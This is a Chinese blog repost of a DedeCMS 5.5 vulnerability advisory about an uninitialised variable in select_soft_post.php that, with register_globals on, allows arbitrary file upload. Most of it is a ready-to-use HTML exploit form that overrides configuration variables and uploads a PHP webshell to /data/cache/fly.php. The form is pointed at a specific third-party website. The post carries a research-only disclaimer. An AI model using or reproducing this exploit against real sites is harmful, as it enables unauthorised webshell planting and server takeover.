首页 > Web开发 > 详细

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

时间：2014-03-22 04:53:43 阅读：836 评论：0 收藏：0 [点我收藏+]

漏洞版本:

Dedecms 5.5

漏洞描述:

漏洞产生文件位于include\dialog\select_soft_post.php，其变量$cfg_basedir没有正确初始化，导致可以饶过身份认证和系统变量初始化文件，导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。

<* 参考

by：Flyh4t
http://sebug.net/appdir/织梦(DedeCms)

测试方法:

@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<bodystyle="FONT-SIZE:9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t----------
<formaction=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.phpmethod=‘POST‘enctype="multipart/form-data"name=‘myform‘>
<inputtype=‘hidden‘name=‘activepath‘value=‘/data/cache/‘/>
<inputtype=‘hidden‘name=‘cfg_basedir‘value=‘../../‘/>
<inputtype=‘hidden‘name=‘cfg_imgtype‘value=‘php‘/>
<inputtype=‘hidden‘name=‘cfg_not_allowall‘value=‘txt‘/>
<inputtype=‘hidden‘name=‘cfg_softtype‘value=‘php‘/>
<inputtype=‘hidden‘name=‘cfg_mediatype‘value=‘php‘/>
<inputtype=‘hidden‘name=‘f‘value=‘form1.enclosure‘/>
<inputtype=‘hidden‘name=‘job‘value=‘upload‘/>
<inputtype=‘hidden‘name=‘newname‘value=‘fly.php‘/>
Select U Shell <inputtype=‘file‘name=‘uploadfile‘size=‘25‘/>
<inputtype=‘submit‘name=‘sb1‘value=‘确定‘/>
</form>
It‘s just a exp for the bug of Dedecms V55...
Need register_globals = on...
Fun the game,get a webshell at /data/cache/fly.php...
</body>
</html>

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞,布布扣,bubuko.com

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

原文：http://www.cnblogs.com/milantgh/p/3616024.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)